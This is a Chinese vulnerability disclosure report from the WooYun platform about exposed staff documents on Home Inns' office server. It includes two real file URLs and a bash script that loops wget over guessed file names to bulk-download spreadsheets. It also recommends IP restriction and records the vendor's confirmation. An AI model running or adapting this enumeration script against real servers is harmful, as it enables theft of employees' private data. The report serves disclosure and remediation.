2014-04-07:细节已通知厂商并且等待厂商处理中
2014-04-07:厂商已经确认,细节仅向厂商公开
2014-04-17:细节向核心白帽子及相关领域专家公开
2014-04-27:细节向普通白帽子公开
2014-05-07:细节向实习白帽子公开
2014-05-22:细节向公众公开
如家酒店敏感信息泄露
详细说明:在这个漏洞中,http://wooyun.org/bugs/wooyun-2014-053008,厂商已经做了修补。但是只是限制了列目录,没有做敏感信息访问的ip限制。
http://office.homeinns.com/staffinfo/SMDocument/Upload/2010-5-1317430.xls
http://office.homeinns.com/staffinfo/OCSDocument/Upload/2013-8-27162223.xlsx
都是可以下载的,那么我们可用用一种简单粗暴的方式来爆跑
#!/bin/bash
for((i=1;i<13;i++))
do
for((j=1000000;j<9999999;j++))
do
wget http://office.homeinns.com/staffinfo/SMDocument/Upload/2010-$i-$j.xls
done
done
nohup ./download.sh &
漏洞证明:
剩下的就只是时间了。
修复方案:对于敏感目录,做ip限制。
版权声明:转载请注明来源 ylaxfcy@乌云 漏洞回应 厂商回应:危害等级:中
漏洞Rank:10
确认时间:2014-04-07 23:21
厂商回复:感谢关注!
最新状态:暂无